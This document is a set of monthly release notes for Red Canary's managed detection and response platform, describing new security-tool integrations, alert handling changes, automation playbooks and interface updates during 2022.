    • Our updated Threat Timeline is now easier to understand and work with, providing the information that you need in a more consistent, accessible, and concise experience. Every Activity in a Threat Timeline now has the same core components: Title, Narrative, and Details. A new “badge” system, on the left side of an Activity, shows information such as Threat Occurred, Indicator of Compromise, or the Endpoint Specified in the Activity. The Annotations and Notes experience is now simply “Comments”. For more information, see Confidence from Context: The Red Canary threat timeline.

    • We’ve released a new integration with Palo Alto Networks, adding Cortex XDR and broadening its detection coverage for mutual customers. Red Canary can now investigate Cortex XDR detections from all Cortex XDR data sources, including network, endpoint, cloud, and third-party data, helping to provide enterprise-wide monitoring. Cortex XDR’s Native Incident Alerts, triggered off of IOCs and BIOCs, are correlated with Red Canary’s detections across the IT environment to provide additional validation and context, all delivered in a unified timeline. Cortex XDR offers various response actions that enable customers to investigate the endpoint and take immediate action to remediate it. You can now use response actions to isolate an endpoint and ban suspicious file hashes environment-wide for faster remediation and ongoing security posture enhancements. For more information, see Integrate Palo Alto Cortex XDR with Red Canary.

    • We’ve expanded MDR coverage of users’ Network environment by adding support for Cisco Meraki. Red Canary now investigates and correlates security alerts from Cisco Meraki products to better detect and respond to Threats for users. For more information, see  Integrate Cisco Meraki with Red Canary.

    New Documentation

    New Videos

    November 2022

    New/Updated Features

    • Red Canary now syncs the SentinelOne analyst verdicts and the incident status fields used to triage and record investigation status and disposition inside of the SentinelOne console with the alert record maintained within Red Canary. This update keeps SentinelOne in lockstep with Red Canary by preventing duplicate efforts and easing user analyst response time and workload.

    • When responding to threats in a CrowdStrike environment, users can now use the automate action, Delete a Registry Key, in the automation section of Red Canary. This enables remediation and incident response to occur without human involvement.

    • We’ve expanded MDR coverage of users' IT environments by adding support for the latest version of Microsoft Graph API. Red Canary investigates and correlates security alerts from third-party security products to better detect and respond to Threats for users and is pleased to recommend the enhanced v2 of this API. For more information, see Integrate Microsoft Graph V2 with Red Canary and Use the Microsoft Graph security API.

    • We’ve expanded MDR coverage of customers’ SaaS environments by adding support for Microsoft Defender for Cloud Apps. Red Canary investigates and correlates security alerts from these products to better detect and respond to Threats for customers. For more information, see Integrate Microsoft Defender for Cloud Apps with Red Canary.

    • Logon events can now be viewed in your identity threat timeline. Red Canary can now add more context to identity threat timelines. For example, if we publish a threat concerning a suspicious email rule, you will see relevant logon events from the user in question. This context helps you better understand why the threat was published, what happened, and what you can do to respond and prevent future threats.

    • 'Threat' has replaced 'detection' as the trigger option for automation.To standardize terminology throughout the platform, the term ‘threat’ has replaced ‘detection’ since it more clearly describes the trigger action to be performed. The dropdown menus in Triggers reflect this update.

    • Live Response Command and Live Response Isolation have been added as Audit Log Trigger options. This was previously accessible only to CarbonBlack Response customers, and is now available for customers using the VMWare CarbonBlack Cloud EDR platform, giving them more Trigger options.

    New Documentation

    New Videos

    October 2022

    New/Updated Features

    • Manual approval for Okta playbooks is no longer required. Manual approval is now optional  and can be automated.

    • Expanded MDR coverage of customers’ network environment by adding support for ExtraHop Reveal (x) 360. Red Canary investigates and correlates security alerts from these products to better detect and respond to Threats for customers. For more information, see Integrate ExtraHop Reveal(x) 360 with Red Canary.

    • Expanded MDR coverage of customers’ network environment by adding support for ExtraHop Reveal X Enterprise. Red Canary investigates and correlates security alerts from these products to better detect and respond to Threats for customers. For more information, see Integrate ExtraHop Enterprise with Red Canary.

    • If a webhook fails, Red Canary will notify your technical contacts, by sending an email detailing the failure, so you can troubleshoot. To prevent flooding the inbox, we will only send one Webhook Failure email per playbook every 24 hours. In addition to sending an email, we will create an Audit Log with "Action: Automate Action Executed", and include details about the error in the Details section.

    • Google Workspace is now available in public preview as a supported MDR integration. Red Canary monitors raw telemetry from Google and publishes threats based on our proprietary analytics.

      Note: As of October 31, 2022, this integration is available as a public preview feature only. For access to the preview, reach out to your Red Canary account team for access.

    • You can now view raw JSON data within your Red Canary dashboard by clicking Alerts, selecting an Alert ID, and then clicking the Show original alert drawer.

    • Red Canary can now push status updates for alerts back to the SentinelOne Singular platform so that users will see the updated status in their SentinelOne dashboard.

    • The Alert List view in the Alerts section has been updated so that it displays the list of associated Events or Threats for an Alert.

    • The Red Canary Hosted VMware Carbon Black EDR fleet has been upgraded to version 7.6.2. This upgrade incorporates the latest Red Canary tested and validated Carbon Black Response features and security patches. Additionally, a new telemetry source that captures fileless script loads has been added to provide enhanced security coverage of malicious process execution.

    New Documentation

    New Videos

    September 2022

    New/Updated Features

    • When you click a link to an Endpoint, Identity, or Intelligence Profile on the Threats page of Red Canary, we now show some of that page’s content in a slide-out panel so that you can view it without having to open another page or tab.

    • You can now add an external service in Microsoft Office 365 without accidentally adding a duplicate external service in Office 365.

    • Red Canary now supports an additional automation action for Sentinel One users. This automation action enables you to configure Red Canary responses to execute processes on endpoints based on your playbook triggers.

    • Forensic packages will now be collected and executed correctly. You can now automatically collect additional forensic information from endpoints for preservation purposes with increased resilience and accuracy.

    • Dark Mode is now available for your homepage setup.

    • Your Red Canary homepage now includes an alerts section with telemetry and alert data types.

    • A new plugin for Response Actions is available for Linux users. The response actions plugin enables you to run actions on a Linux endpoint triggered in response to threats. This update also applies to the Red Canary Portal Automations feature. For more information, see Use the Response Actions Plugin.

    New Documentation

    New Videos

    August 2022

    New/Updated Features

    • Customers who subscribe to Linux EDR can now filter and review telemetry observed within the last 7 days. To learn more, see Filtering telemetry.

    • When you log in to Red Canary, enjoy a newly redesigned homepage that now displays vital threat information front and center. Additional data is also now available on the homepage, including:

      • Key activities Red Canary has performed in the last 90 days, such as the number of leads investigated and threats discovered

      • The number of endpoints monitored over a specified timeframe

      • An enhanced activity feed that not only shows you security actions executing in your environment, such as playbooks firing, but also additional industry news, blog posts, and more.

      • The amount of telemetry and number of alerts Red Canary has ingested and analyzed from your integrated security products  over a specified timeframe

      • Highlighting any actionable items, such as unresolved threats, endpoints not sending telemetry, and alert sources needing configuration

    • Okta Workforce Identity Events with the classification of “A bypass of MFA may have been attempted for this user“ will now be ingested as alerts and triaged for Threat Investigation users.

    • Palo Alto Networks Threat Prevention now generates external alerts within Red Canary. You now have another option when it comes to third-party security platforms that generate external alerts.

    • When you resolve a SentinelOne alert in Red Canary, the resolution status updates automatically in SentinelOne.

    New Documentation

    New Videos

    July 2022

    New/Updated Features

    • Microsoft Defender for Endpoint customers can now quickly identify which of their endpoints are Live Response capable in the Red Canary portal. Live Response through the Microsoft Defender for Endpoint sensor requires specific Windows versions and builds, and endpoints are now automatically tagged to identify which endpoints are Live Response capable.

    • Red Canary Analytics now incorporates CrowdStrike notifications that relate to detected ransomware creating files on an endpoint. This provides us further ability to monitor and alert you when ransomware attacks occur.

    • In the Expert Analysis & Investigation report, we updated “Investigated Events” to “Analyzed Events,” which now matches the corresponding By the Numbers report value.

    • Cisco Umbrella now generates external alerts within Red Canary. You now have another option when it comes to third-party security platforms that generate external alerts.

    • Palo Alto Networks WildFire now generates external alerts within Red Canary. You now have another option when it comes to third-party security platforms that generate external alerts.

    • Red Canary now automatically synchronizes SentinelOne site names to a Red Canary reporting tag. Reporting tags can be used in automations and endpoint filtering.

    • You can now click on correlated identities and navigate to the identities detail page from the Alerts table page.

    • Red Canary’s parsing logic has been enhanced to account for certain Dragos alerts that include special characters as leading or trailing identifiers in the alert. These characters were causing errors when parsing the alert data.

    • Darktrace parsing is now enhanced to handle nested JSON data in the native alert information.

    • Alerts that are re-ingested will no longer be escalated as a new event. This issue was duplicating events when ingesting occurred.

    • PAN-OS alerts that contain multiple nested alerts are now parsed correctly as separate, individual alerts within Red Canary.

    • Playbook triggers have been updated to replace the legacy “Priority” attributes with the new “Status” attributes. You do not need to take any action with this update.

    • Parsing for FortiNet FortiGate alerts is now updated to correctly map the data attributes to the Red Canary data schema.

    New Documentation

    June 2022

    New/Updated Features

    • Alerts are now assigned to either “Red Canary” or “Your Team” based on which team is responsible for the alert during its investigation.

    • You can now create, edit, and delete endpoint and identity tags in bulk, speeding up the process of updating your endpoint and identify environment.

    • You can now more easily determine where your attention is most needed by viewing and sorting Intelligence Profiles based on how prevalent they are in an environment.

    • When searching for alerts in a specified timeframe, the results correctly aggregate and display the alerts within that range.

    • The GuardDuty network connection parser now creates a single correlated device for the internal IP address.

    New Documentation

    May 2022

    New/Updated Features

    • Red Canary looks a little different! We’re updating the interface to be easier to navigate and more user-friendly. Most notably, the left navigation menu has been updated to include subpages for faster navigation, and the background has been changed to provide more contrast for better readability. Be on the look out for updates as we continue to finesse these exciting changes.

    • The Alerts page has been updated to support Red Canary’s alert management service. You can now review all your alerts ingested by Red Canary in one place while also being able to search for a set of alerts or individual alerts, view an alert’s details, determine the current status of an alert, and see if an alert is part of an ongoing event or threat.

    • Red Canary Alerts now have new Status states and an updated workflow that better supports the new end-to-end Manage, Detection and Response (MDR) service. With this update, Red Canary can provide detection and response beyond the traditional EDR endpoints.

    • To help you find threats of account takeover, Red Canary now examines raw telemetry from Microsoft Office 365. To learn more about integrating Office 365 with Red Canary, check out Integrate Microsoft Office 365 with Red Canary.

    • VMware Carbon Black Response customers hosted by Red Canary will now expedite data archival.

    • The is_protected status has been removed from Red Canary to prevent inaccurate reporting and playbook actions. This status was originally intended to show that an endpoint was both checking in and sending telemetry to Red Canary within the previous 3 hours, but because of the random nature of EDR telemetry collection, it wasn’t a reliable measure of an endpoint’s status. With this change, playbooks using the is_protected status as a trigger will no longer work.

    • VMware Carbon Black Response users will now see status check help text in Red Canary that is updated to match the VMware features and setting name changes introduced in version 7.5.1.

    New Documentation

    April 2022

    New/Updated Features

    • VMware Carbon Black EDR Windows Sensor Version 7.3.0 is now available across the Red Canary hosted Carbon Black server fleet. Learn more about Sensor Version 7.3.0.

    • You can now use the CrowdStrike kill process response action to quickly remediate process threats.

    • Jamf users can now update their Jamf isolation group using Red Canary’s external service configuration.

    • We’ve updated the term “detections” and “confirmed threats” in Red Canary to just “threats.” This is part of a larger initiative to streamline the threat timeline to provide a more holistic view of what is or has occurred during a threat. This change won’t impact your APIs and URLs. Look for more information about the updated threat timeline in the coming weeks.

    • You’re now able to respond and isolate any endpoints in your Jamf environment. Jamf was previously limited to the first 100 endpoints, which limited response actions.

    • You can now collect forensic packages on CrowdStrike endpoints. Users managed by Red Canary’s Managed Security Service Provider (MSSP) will notice the addition of a “run” permission in a real-time response, which enables this collection to occur.

    New Documentation

    March 2022

    New/Updated Features

    • Four new Security Alert Automation Playbooks were added to Red Canary. The new playbooks include Assign an alert to a user, Unassign an alert, Set alert investigation result, and Add note to an alert. These new playbooks provide more flexibility to users when managing alerts.

    • The integration between Red Canary and Okta Workforce Identity was enhanced to capture additional alert information types related to account locks, privilege escalation, privilege revoke, password reset, and secondary email creation. These alert types are potential indicators of compromise (IOC) and are useful data points for threat investigations.

    • A new status monitoring and notification feature was added to the Status Checks interface in Red Canary. This notification will alert users if the API polling for their configured Alert Source platforms stops responding and requires attention.

    • The Jamf provisioning process no longer requires the Jamf Support team to engage. This helps streamline the provisioning process.

    • The Top 20 observed MITRE ATT&CK techniques have been updated based on the 2022 Threat Detection Report.

    • We’ve added the following examples of our Incident Handling team’s playbooks to Red Canary:

      • IH - Phone Escalation: calls and texts specified phone numbers in the event of a detection

      • IH - Isolate: automatically isolates an endpoint without requiring human approval

      • IH - Isolate Approval: sends an email requesting approval to isolate an endpoint

      • IH - IOC Remediation: runs through a series of processes to remediate indicators of compromise (IOC)

      • IH - Notify Customer of New Note: sends an email when Red Canary creates a new note

    • To provide a more accurate view of SentinelOne Singularity alerts, the alerts detail display was updated to include the correct corresponding detail information.

    • The Red Canary by the Numbers report now returns an accurate count of investigative leads.

    • The Confirmed Threats report has been updated to more accurately reflect where confirmed threats came from.

    • If you had received an email with a link to a specific page in Red Canary but weren’t signed in through single sign-on, you would have been directed to authenticate then redirected to the Red Canary dashboard. Now, after authenticating through single sign-on, you’ll be directed to the correct page that was linked.

    • The security alert data parser has been updated to resolve problems with identifying native Cylance security scoring data. This update provides more context to the alert and allows for better prioritization of information.

    • The Alert Source integration configuration now decommissions previous data collectors when customers change their data ingest method (API, Syslog, TCP, HTTPS). Prior to this fix, you could receive redundant Alerts due to both the old and new ingest methods remaining enabled.

    • There was an issue where a user could receive a “404 - Not Found” error when searching for Automate Playbook Executed in an audit log. Audit logs should now return all results.

    • Previously, if a user entered an invalid search term on the Endpoints page, the page would error without notifying the user. Now if a user’s search fails, they will receive a notification that links them to information about valid search terms.

    • Sorting on the Applications page now takes numbers in an application’s name into account. Previously, names that contained numbers were ignored.

    New Documentation

    February 2022

    New/Updated Features

    • Imperva Web Application Firewall (WAF) security related alerts are now supported in Red Canary. You can view Imperva WAF security related notifications in Red Canary to prioritize and manage your security alerts.

    • Jamf now generates external alerts within Red Canary. You now have another option when it comes to third-party security platforms that generate external alerts.

    • Cisco Firepower is now supported as part of the threat investigation service. You can configure the ingestion of Cisco Firepower alerts via email. These alerts are aggregated and correlated to endpoint and identity data across your enterprise. For users with the threat investigation service, Red Canary analysts will provide Tier 1 triage and prioritization of these network alerts to help streamline your threat remediation process.

    • GitHub security-related alerts are now supported in Red Canary. You can view GitHub security-related notifications in Red Canary to prioritize and manage your security alerts.

    • The detection timeline now uses the term “blocklist” instead of “blacklist” as part of our inclusive language effort.

    • We’re excited to announce that Intelligence Insights are now available in Red Canary. Intelligence Insights are researched and developed by the Red Canary Intelligence Team and designed to provide you with both long-term trends and time-sensitive threat intelligence so you can make informed decisions about your security posture.

    • All existing customers are enrolled to receive Intelligence Insights emails, and you can also view them directly in Red Canary by clicking Analytics & Intelligence, and then clicking Intelligence Insights. You’ll find all previously published Intelligence Insights here as well.

      To opt-out of receiving Intelligence Insight emails, navigate to your user profile, and then unselect Email me when Red Canary publishes an intelligence insight.

    • Sorting on the Applications page now takes into account lowercase names.

    • The Getting Help page in Red Canary was updated with information about who to contact at Red Canary for technical support and emergencies.

    • Jamf Pro and Jamf Protect sensor IDs now correlate within Red Canary for all supported macOS versions. The full hostname and endpoint data from Jamf Pro is now related to your Jamf Protect telemetry.

    New Documentation

    January 2022

    New/Updated Features

    • Alert Filters replaced the Suppression Rules tab under External Alerts. Previously, you could only mark alerts as "Not a threat." Now you can proactively change alert status, assign alerts to specific users, and add comments. These additions greatly improve your alert management capabilities by automatically advancing known or previously triaged alert types through your alert management process.

    • Response actions have been added to the Red Canary and Jamf integration. You can now add and remove Jamf endpoints from network isolation groups enabling rapid remediation. For more information, see Isolate and De-isolate Endpoints using Jamf.

    • Red Canary now collects identity information about confirmed threats from Okta Workforce Identity. This enables us to provide a faster, more complete response for customers using Okta.

    • As a customer_admin, you are now able to reset the Carbon Black Live Response using the Getting Help page. This is useful when Live Response becomes non-responsive. This function is only available for Red Canary-hosted Carbon Black Response servers at this time.

    • You can now import security alert data from FortiNet FortiGate for analysis and management within the Red Canary platform using syslog ingestion.

    • Additional security data attribute aggregation has been added to Palo Alto PAN-OS source platforms. These additional attribute fields will allow us to correlate alerts to endpoints and provide threat identification data for PAN-OS alerts.

    • Endpoints running Jamf Protect can now be added and removed from network isolation in Red Canary.

    • Automated playbook actions will now trigger based on the alert priority.

    • In accordance with our end of life policy, the following recently outdated sensor versions will be supported until April 7, 2022.

    • Alert data from Proofpoint Targeted Attack Protection now correlates to endpoints correctly. In previous versions, a data parsing issue resulted in erroneous endpoint identification.

    • Jamf timelines now include all process trees and related file modification indicators. This data helps to improve clarity and analysis of confirmed threats by including context around detections.

    • SentinelOne users now have a streamlined view of tip-offs, due to correlated external alerts generating unique tip-offs on a per-event basis.

    • Cisco Umbrella and Cisco Duo alerts will no longer experience data ingestion failures due to security data parsing issues.

    • API polling for Sentinel One security alert data ingestion now includes the correct identification of account ID information.

    New Documentation


    Was this article helpful?